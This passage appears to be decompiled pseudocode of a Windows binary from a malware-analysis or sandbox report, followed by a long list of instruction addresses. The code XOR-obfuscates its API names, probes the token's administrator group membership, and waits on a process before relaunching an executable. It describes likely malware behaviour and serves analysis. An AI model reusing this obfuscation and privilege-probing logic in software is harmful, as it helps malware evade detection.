							 *_t1126 =  *_t1126 ^ 0x000000d4;
							_t1126 =  &(_t1126[1]);
						}
						_t1127 = GetProcAddress(_t1217, "NtOpenProcessToken");
						__eflags = _t1127;
						_t1310 = _t1127;
						if(_t1127 == 0) {
							goto L77;
						}
						_t1128 = GetProcAddress(_t1217, "NtQueryInformationToken");
						__eflags = _t1128;
						_t1285 = _t1128;
						if(_t1128 == 0) {
							goto L77;
						}
						_t1130 =  *_t1310(0xffffffff, 8, _t1316 + 0xa0);
						__eflags = _t1130;
						if(_t1130 < 0) {
							goto L77;
						}
						_t1311 = _t1316 + 0x9c;
						_t1132 = E00401000(0x2000);
						_t1218 = _t1132;
						_t1133 =  *_t1285( *(_t1316 + 0xb0), 2, _t1132, 0x2000, _t1311); // executed
						__eflags = _t1133;
						if(_t1133 < 0) {
							L69:
							E00401029(_t1218);
							CloseHandle( *(_t1316 + 0xa0)); // executed
							goto L77;
						}
						 *(_t1316 + 0x34) = 0;
						_t1221 =  *_t1218;
						while(1) {
							__eflags =  *(_t1316 + 0x34) - _t1221;
							if( *(_t1316 + 0x34) >= _t1221) {
								goto L69;
							}
							_t1232 =  *(_t1316 + 0x34);
							_t1137 = _t1218[8 + _t1232 * 8];
							__eflags = _t1137 & 0x00000004;
							if((_t1137 & 0x00000004) == 0) {
								L68:
								 *(_t1316 + 0x34) =  *(_t1316 + 0x34) + 1;
								continue;
							}
							__eflags = _t1137 & 0x00000010;
							if((_t1137 & 0x00000010) != 0) {
								goto L68;
							}
							_t1232 = _t1218[4 + _t1232 * 8];
							_t1139 =  *((intOrPtr*)(_t1232 + 4 + ( *(_t1232 + 1) & 0x000000ff) * 4));
							__eflags = _t1139 - 0x220;
							if(__eflags == 0) {
								L63:
								 *(_t1316 + 0xb) = 0;
								 *0x412020 = 1; // executed
								_t1140 =  *_t1285( *(_t1316 + 0xb0), 1, _t1218, 0x2000, _t1311); // executed
								__eflags = _t1140;
								if(_t1140 >= 0) {
									_t1141 =  *_t1218;
									__eflags =  *((char*)(_t1141 + 1)) - 1;
									if( *((char*)(_t1141 + 1)) == 1) {
										__eflags =  *((intOrPtr*)(_t1141 + 8)) - 0x12;
										if( *((intOrPtr*)(_t1141 + 8)) == 0x12) {
											 *(_t1316 + 0xb) = 1;
										}
									}
								}
								_t1232 =  *(_t1316 + 0xb) & 0x000000ff;
								 *0x412010 = _t1232;
								goto L69;
							}
							if(__eflags > 0) {
								__eflags = _t1139 - 0x223;
							} else {
								__eflags = _t1139 - 0x200;
							}
							if(__eflags != 0) {
								goto L68;
							} else {
								goto L63;
							}
						}
						goto L69;
					}
					_t1144 = CreateToolhelp32Snapshot(2, 0);
					 *(_t1316 + 0xa0) = _t1144;
					__eflags = _t1144;
					if(_t1144 == 0) {
						goto L456;
					}
					 *(_t1316 + 0x9c) = GetCurrentProcessId();
					_t1219 = 0;
					__eflags = 0;
					 *(_t1316 + 0x9e8) = 0x128;
					_t1147 = Process32First( *(_t1316 + 0xa4), _t1316 + 0x9e8);
					while(1) {
						__eflags = _t1147;
						if(_t1147 == 0) {
							break;
						}
						__eflags =  *((intOrPtr*)(_t1316 + 0x9f0)) -  *(_t1316 + 0x9c);
						if( *((intOrPtr*)(_t1316 + 0x9f0)) ==  *(_t1316 + 0x9c)) {
							_t1219 = OpenProcess(0x100000, 0,  *(_t1316 + 0xa00));
							break;
						}
						_t1147 = Process32Next( *(_t1316 + 0xa4), _t1316 + 0x9e8);
					}
					CloseHandle( *(_t1316 + 0xa0));
					__eflags = _t1219;
					if(_t1219 == 0) {
						goto L456;
					}
					WaitForSingleObject(_t1219, 0xffffffff);
					CloseHandle(_t1219);
					_t1220 = _t1316 + 0xb28;
					GetStartupInfoA(_t1220);
					CreateProcessA(_t1316 + 0x158c, 0, 0, 0, 0, 0, 0, 0, _t1220, _t1316 + 0xb18);
					goto L455;
				}
				_t1156 = 0x4107cf;
				while(1) {
					__eflags = _t1156 - 0x4107e5;
					if(_t1156 >= 0x4107e5) {
						break;
					}
					 *_t1156 =  *_t1156 ^ 0x000000d4;
					_t1156 =  &(_t1156[1]);
				}
				_t1157 = GetProcAddress(_t1162, 0x4107cf);
				__eflags = _t1157;
				if(_t1157 != 0) {
					 *_t1157(0, 1);
				}
				goto L14;
			}

0x004033f4
0x004033f9
0x00403401
0x00403409
0x00403411
0x00403419
0x0040342b
0x00403430
0x0040343a
0x0040343f
0x00403444
0x0040344b
0x0040344e
0x0040344e
0x00403451
0x00403456
0x00403456
0x0040345b
0x00000000
0x00000000
0x0040345d
0x0040345d
0x00403460
0x00403460
0x00403468
0x0040346d
0x00403474
0x00403476
0x0040349f
0x004034ae
0x004034b3
0x004034b8
0x004034bd
0x004034c2
0x004034c4
0x004035a3
0x004035aa
0x004035af
0x004037c7
0x004037c7
0x004037cc
0x00000000
0x00000000
0x004037ce
0x004037ce
0x004037d1
0x004037d1
0x004037df
0x004037e1
0x004037e1
0x004037e7
0x00000000
0x00000000
0x004037e9
0x004037e9
0x004037ec
0x004037f2
0x004037fd
0x00403807
0x00403807
0x0040380d
0x00403814
0x00403815
0x00403817
0x0040381c
0x00403823
0x00403832
0x00403832
0x00403834
0x00403839
0x0040383f
0x0040383f
0x00403844
0x00000000
0x00000000
0x00403846
0x00403849
0x00403849
0x00403851
0x00403856
0x00403858
0x0040385a
0x00403880
0x0040388a
0x0040388a
0x0040388f
0x0040388f
0x00403894
0x00000000
0x00000000
0x00403896
0x00403899
0x00403899
0x004038a1
0x004038a6
0x004038a8
0x004038aa
0x004038d0
0x004038da
0x004038da
0x004038df
0x004038df
0x004038e4
0x00000000
0x00000000
0x004038e6
0x004038e9
0x004038e9
0x004038ec
0x004038f1
0x004038f1
0x004038f6
0x00000000
0x00000000
0x004038f8
0x004038f8
0x004038fb
0x004038fb
0x004038fe
0x00403903
0x00403903
0x00403908
0x00000000
0x00000000
0x0040390a
0x0040390a
0x0040390d
0x0040390d
0x00403910
0x00403915
0x00403915
0x0040391a
0x00000000
0x00000000
0x0040391c
0x0040391c
0x0040391f
0x0040391f
0x00403922
0x00403927
0x00403927
0x0040392c
0x00000000
0x00000000
0x0040392e
0x0040392e
0x00403931
0x00403931
0x00403934
0x00403939
0x00403939
0x0040393e
0x00000000
0x00000000
0x00403940
0x00403940
0x00403943
0x00403943
0x0040394b
0x00403950
0x00403952
0x00403954
0x00403a06
0x00403a10
0x00403a10
0x00403a15
0x00403a15
0x00403a1a
0x00000000
0x00000000
0x00403a1c
0x00403a1f
0x00403a1f
0x00403a22
0x00403a27
0x00403a27
0x00403a2c
0x00000000
0x00000000
0x00403a2e
0x00403a2e
0x00403a31
0x00403a31
0x00403a34
0x00403a39
0x00403a39
0x00403a3e
0x00000000
0x00000000
0x00403a40
0x00403a40
0x00403a43
0x00403a43
0x00403a46
0x00403a4b
0x00403a4b
0x00403a50
0x00000000
0x00000000
0x00403a52
0x00403a52
0x00403a55
0x00403a55
0x00403a58
0x00403a5d
0x00403a5d
0x00403a62
0x00000000
0x00000000
0x00403a64
0x00403a64
0x00403a67
0x00403a67
0x00403a6a
0x00403a6f
0x00403a6f
0x00403a74
0x00000000
0x00000000
0x00403a76
0x00403a76
0x00403a79
0x00403a79
0x00403a7c
0x00403a81
0x00403a81
0x00403a86
0x00000000
0x00000000
0x00403a88
0x00403a88
0x00403a8b
0x00403a8b
0x00403a8e
0x00403a93
0x00403a93
0x00403a98
0x00000000
0x00000000
0x00403a9a
0x00403a9a
0x00403a9d
0x00403a9d
0x00403aa0
0x00403aa5
0x00403aa5
0x00403aaa
0x00000000
0x00000000
0x00403aac
0x00403aac
0x00403aaf
0x00403aaf
0x00403ab2
0x00403ab7
0x00403ab7
0x00403abc
0x00000000
0x00000000
0x00403abe
0x00403abe
0x00403ac1
0x00403ac1
0x00403ac4
0x00403ac9
0x00403ac9
0x00403ace
0x00000000
0x00000000
0x00403ad0
0x00403ad0
0x00403ad3
0x00403ad3
0x00403ad6
0x00403adb
0x00403adb
0x00403ae0
0x00000000
0x00000000
0x00403ae2
0x00403ae2
0x00403ae5
0x00403ae5
0x00403ae8
0x00403aed
0x00403aed
0x00403af2
0x00000000
0x00000000
0x00403af4
0x00403af4
0x00403af7
0x00403af7
0x00403afa
0x00403aff
0x00403aff
0x00403b04
0x00000000
0x00000000
0x00403b06
0x00403b06
0x00403b09
0x00403b09
0x00403b0c
0x00403b11
0x00403b11
0x00403b16
0x00000000
0x00000000
0x00403b18
0x00403b18
0x00403b1b
0x00403b1b
0x00403b1e
0x00403b23
0x00403b23
0x00403b28
0x00000000
0x00000000
0x00403b2a
0x00403b2a
0x00403b2d
0x00403b2d
0x00403b30
0x00403b35
0x00403b35
0x00403b3a
0x00000000
0x00000000
0x00403b3c
0x00403b3c
0x00403b3f
0x00403b3f
0x00403b42
0x00403b47
0x00403b47
0x00403b4c
0x00000000
0x00000000
0x00403b4e
0x00403b4e
0x00403b51
0x00403b51
0x00403b54
0x00403b59
0x00403b59
0x00403b5e
0x00000000
0x00000000
0x00403b60
0x00403b60
0x00403b63
0x00403b63
0x00403b66
0x00403b6b
0x00403b6b
0x00403b70
0x00000000
0x00000000
0x00403b72
0x00403b72
0x00403b75
0x00403b75
0x00403b78
0x00403b7d
0x00403b7d
0x00403b82
0x00000000
0x00000000
0x00403b84
0x00403b84
0x00403b87
0x00403b87
0x00403b8a
0x00403b8f
0x00403b8f
0x00403b94
0x00000000
0x00000000
0x00403b96
0x00403b96
0x00403b99
0x00403b99
0x00403b9c
0x00403ba1
0x00403ba1
0x00403ba6
0x00000000
0x00000000
0x00403ba8
0x00403ba8
0x00403bab
0x00403bab
0x00403bae
0x00403bb3
0x00403bb3
0x00403bb8
0x00000000
0x00000000
0x00403bba
0x00403bba
0x00403bbd
0x00403bbd
0x00403bc0
0x00403bc5
0x00403bc5
0x00403bca
0x00000000
0x00000000
0x00403bcc
0x00403bcc
0x00403bcf
0x00403bcf
0x00403bd2
0x00403bd7
0x00403bd7
0x00403bdc
0x00000000
0x00000000
0x00403bde
0x00403bde
0x00403be1
0x00403be1
0x00403be4
0x00403be9
0x00403be9
0x00403bee
0x00000000
0x00000000
0x00403bf0
0x00403bf0
0x00403bf3
0x00403bf3
0x00403bf6
0x00403bfb
0x00403bfb
0x00403c00
0x00000000
0x00000000
0x00403c02
0x00403c02
0x00403c05
0x00403c05
0x00403c08
0x00403c0d
0x00403c0d
0x00403c12
0x00000000
0x00000000
0x00403c14
0x00403c14
0x00403c17
0x00403c17
0x00403c1a
0x00403c1f
0x00403c1f
0x00403c24
0x00000000
0x00000000
0x00403c26
0x00403c26
0x00403c29
0x00403c29
0x00403c2c
0x00403c31
0x00403c31
0x00403c36
0x00000000
0x00000000
0x00403c38
0x00403c38
0x00403c3b
0x00403c3b
0x00403c3e
0x00403c43
0x00403c43
0x00403c48
0x00000000
0x00000000
0x00403c4a
0x00403c4a
0x00403c4d
0x00403c4d
0x00403c50
0x00403c55
0x00403c55
0x00403c5a
0x00000000
0x00000000
0x00403c5c
0x00403c5c
0x00403c5f
0x00403c5f
0x00403c62
0x00403c67
0x00403c67
0x00403c6c
0x00000000
0x00000000
0x00403c6e
0x00403c6e
0x00403c71
0x00403c71
0x00403c74
0x00403c79
0x00403c79
0x00403c7e
0x00000000
0x00000000
0x00403c80
0x00403c80
0x00403c83
0x00403c83
0x00403c86
0x00403c8b
0x00403c8b
0x00403c90
0x00000000
0x00000000
0x00403c92
0x00403c92
0x00403c95
0x00403c95
0x00403c98
0x00403c9d
0x00403c9d
0x00403ca2
0x00000000
0x00000000
0x00403ca4
0x00403ca4
0x00403ca7
0x00403ca7
0x00403caa
0x00403caf
0x00403caf
0x00403cb4
0x00000000
0x00000000
0x00403cb6
0x00403cb6
0x00403cb9
0x00403cb9
0x00403cbc
0x00403cc1
0x00403cc1
0x00403cc6
0x00000000
0x00000000
0x00403cc8
0x00403cc8
0x00403ccb
0x00403ccb
0x00403cce
0x00403cd3
0x00403cd3
0x00403cd8
0x00000000
0x00000000
0x00403cda
0x00403cda
0x00403cdd
0x00403cdd
0x00403ce0
0x00403ce5
0x00403ce5
0x00403cea
0x00000000
0x00000000
0x00403cec
0x00403cec
0x00403cef
0x00403cef
0x00403cf2
0x00403cf7
0x00403cf7
0x00403cfc
0x00000000
0x00000000
0x00403cfe
0x00403cfe
0x00403d01
0x00403d01
0x00403d04
0x00403d09
0x00403d09
0x00403d0e
0x00000000
0x00000000
0x00403d10
0x00403d10
0x00403d13
0x00403d13
0x00403d16
0x00403d1b
0x00403d1b
0x00403d20
0x00000000
0x00000000
0x00403d22
0x00403d22
0x00403d25
0x00403d25
0x00403d28
0x00403d2d
0x00403d2d
0x00403d32
0x00000000
0x00000000
0x00403d34
0x00403d34
0x00403d37
0x00403d37
0x00403d3a
0x00403d3f
0x00403d3f
0x00403d44
0x00000000
0x00000000
0x00403d46
0x00403d46
0x00403d49
0x00403d49
0x00403d4c
0x00403d51
0x00403d51
0x00403d56
0x00000000
0x00000000
0x00403d58
0x00403d58
0x00403d5b
0x00403d5b
0x00403d5e
0x00403d63
0x00403d63
0x00403d68
0x00000000
0x00000000
0x00403d6a
0x00403d6a
0x00403d6d
0x00403d6d
0x00403d70
0x00403d75
0x00403d75
0x00403d7a
0x00000000
0x00000000
0x00403d7c
0x00403d7c
0x00403d7f
0x00403d7f
0x00403d82
0x00403d87
0x00403d87
0x00403d8c
0x00000000
0x00000000
0x00403d8e
0x00403d8e
0x00403d91
0x00403d91
0x00403d94
0x00403d99
0x00403d99
0x00403d9e
0x00000000
0x00000000
0x00403da0
0x00403da0
0x00403da3
0x00403da3
0x00403da6
0x00403dab
0x00403dab
0x00403db0
0x00000000
0x00000000
0x00403db2
0x00403db2
0x00403db5
0x00403db5
0x00403db8
0x00403dbd
0x00403dbd
0x00403dc2
0x00000000
0x00000000
0x00403dc4
0x00403dc4
0x00403dc7
0x00403dc7
0x00403dca
0x00403dcf
0x00403dcf
0x00403dd4
0x00000000
0x00000000
0x00403dd6
0x00403dd6
0x00403dd9
0x00403dd9
0x00403ddc
0x00403de1
0x00403de1
0x00403de6
0x00000000
0x00000000
0x00403de8
0x00403de8
0x00403deb
0x00403deb
0x00403dee
0x00403df3
0x00403df3
0x00403df8
0x00000000
0x00000000
0x00403dfa
0x00403dfa
0x00403dfd
0x00403dfd
0x00403e05
0x00403e05
0x00403e0a
0x00000000
0x00000000
0x00403e0c
0x00403e0c
0x00403e0d
0x00403e0d
0x00403e17
0x00403e17
0x00403e1c
0x00000000
0x00000000
0x00403e1e
0x00403e1e
0x00403e1f
0x00403e1f
0x00403e29
0x00403e29
0x00403e2e
0x00000000
0x00000000
0x00403e30
0x00403e30
0x00403e31
0x00403e31
0x00403e4d
0x00403e52
0x00403e59
0x00403e5b
0x00403e5d
0x00403e60
0x00403e69
0x00403e86
0x00403e92
0x00403e97
0x00403e9e
0x00403ea5
0x00403eaa
0x00403eaa
0x00403e9e
0x00403e60
0x00403eb2
0x00403eb7
0x00403eb7
0x00403ebc
0x00000000
0x00000000
0x00403ebe
0x00403ec1
0x00403ec1
0x00403ec4
0x00403ec9
0x00403ec9
0x00403ece
0x00000000
0x00000000
0x00403ed0
0x00403ed0
0x00403ed3
0x00403ed3
0x00403ed6
0x00403ee2
0x00403ef3
0x00403f09
0x00403f1f
0x00403f35
0x00403f3a
0x00403f46
0x00403f4b
0x00403f51
0x00403f5d
0x00403f62
0x00403f63
0x00403f68
0x00403f6a
0x00403f6a
0x00403f70
0x00403f74
0x00403f79
0x00403f79
0x00403f7e
0x00000000
0x00000000
0x00403f80
0x00403f80
0x00403f83
0x00403f83
0x00403f86
0x00403f8b
0x00403f8b
0x00403f90
0x00000000
0x00000000
0x00403f92
0x00403f92
0x00403f95
0x00403f95
0x00403f98
0x00403f9d
0x00403f9d
0x00403fa2
0x00000000
0x00000000
0x00403fa4
0x00403fa4
0x00403fa7
0x00403fa7
0x00403faa
0x00403fb2
0x00403fb2
0x00403fc0
0x00403fd1
0x00403fd6
0x00403fda
0x00403fdd
0x00403fdf
0x00000000
0x00000000
0x00403fe5
0x00403fea
0x00403fef
0x0040426e
0x00404273
0x0040428c
0x00404299
0x0040429e
0x004042a0
0x004042b2
0x004042b7
0x004042be
0x004042c1
0x004042c3
0x004042de
0x004042ea
0x004042ef
0x004042ef
0x004042c3
0x004042f7
0x004042fc
0x004044af
0x004044c6
0x004044cb
0x004044d2
0x004044d4
0x00404517
0x00404517
0x0040451f
0x0040451f
0x00404521
0x00404545
0x0040454a
0x0040454f
0x0040454f
0x00404554
0x00000000
0x00000000
0x00404556
0x00404559
0x00404559
0x00404561
0x00404561
0x00404566
0x00000000
0x00000000
0x00404568
0x00404568
0x00404569
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00405971
0x00405978
0x00405984
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x00405955
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00000000
0x00000000
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00000000
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b2e
0x00405b4c
0x00405b51
0x00405b53
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00000000
0x00405542
0x0040552e
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00000000
0x00405bee
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00000000
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00000000
0x0040565f
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00000000
0x00405658
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404edb
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cd5
0x00404cc9
0x00000000
0x00404cc9
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x00404b88
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
